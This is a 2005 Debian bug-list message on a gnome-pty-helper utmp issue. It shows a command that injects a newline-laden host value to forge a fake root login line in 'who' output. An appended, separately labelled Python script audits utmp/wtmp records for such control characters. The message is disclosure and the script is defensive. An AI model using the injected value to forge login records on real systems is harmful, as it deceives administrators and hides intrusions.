Bug#330907: gnome-pty-helper foo

Paul Szabo psz at maths.usyd.edu.au
Wed Oct 12 02:21:18 UTC 2005


I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wtmp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; and expect that

psz at savona:~$ exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz      pts/2        Oct 12 12:16 (XX)
root     tty01        Jan 01 02:03 (insecure.com)
psz      pts/1        Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+  Done                    exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')"
psz at savona:~$ 

should suitably freak them out.

Cheers,

Paul Szabo   psz at maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia
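
An added example, not part of the original message or of any Debian or GNOME code: a utmp/wtmp audit that flags records whose text fields contain control characters such as the embedded newline in the ut_host value shown above, which `who` prints verbatim. It assumes the Linux/glibc 384-byte little-endian record layout; the function names and the sample records are constructed for illustration.

```python
import struct

# Assumption: Linux/glibc `struct utmp` layout, 384 bytes, little-endian.
UTMP = struct.Struct("<h2xi32s4s32s256shhiii4i20x")
# Positions of the checked text fields in an unpacked record.
CHECKED = ((2, "ut_line"), (4, "ut_user"), (5, "ut_host"))


def _text(raw):
    """Decode a fixed-width, NUL-padded utmp field."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def audit_utmp(blob):
    """Return (record_index, field, value) for every checked field that holds
    a control character, which who/last would print unescaped."""
    findings = []
    for idx in range(len(blob) // UTMP.size):
        rec = UTMP.unpack_from(blob, idx * UTMP.size)
        for pos, name in CHECKED:
            value = _text(rec[pos])
            if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
                findings.append((idx, name, value))
    return findings


def make_record(line, user, host, pid=0, ut_type=7):
    """Build one constructed record (ut_type 7 is USER_PROCESS)."""
    return UTMP.pack(ut_type, pid, line, b"", user, host,
                     0, 0, 0, 0, 0, 0, 0, 0, 0)


# Constructed sample mirroring the `who` output quoted in the message.
SAMPLE = (
    make_record(b"pts/2", b"psz",
                b"XX)\nroot     tty01        Jan 01 02:03 (insecure.com")
    + make_record(b"pts/1", b"psz", b"y622.yt.maths.usyd.edu.au:0.0")
)

if __name__ == "__main__":
    for idx, name, value in audit_utmp(SAMPLE):
        # repr() keeps the embedded newline visible instead of rendering it.
        print(f"record {idx}: control character in {name}: {value!r}")
```

To audit a live system, pass the bytes of `/var/run/utmp` or `/var/log/wtmp` to `audit_utmp` in place of `SAMPLE`.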
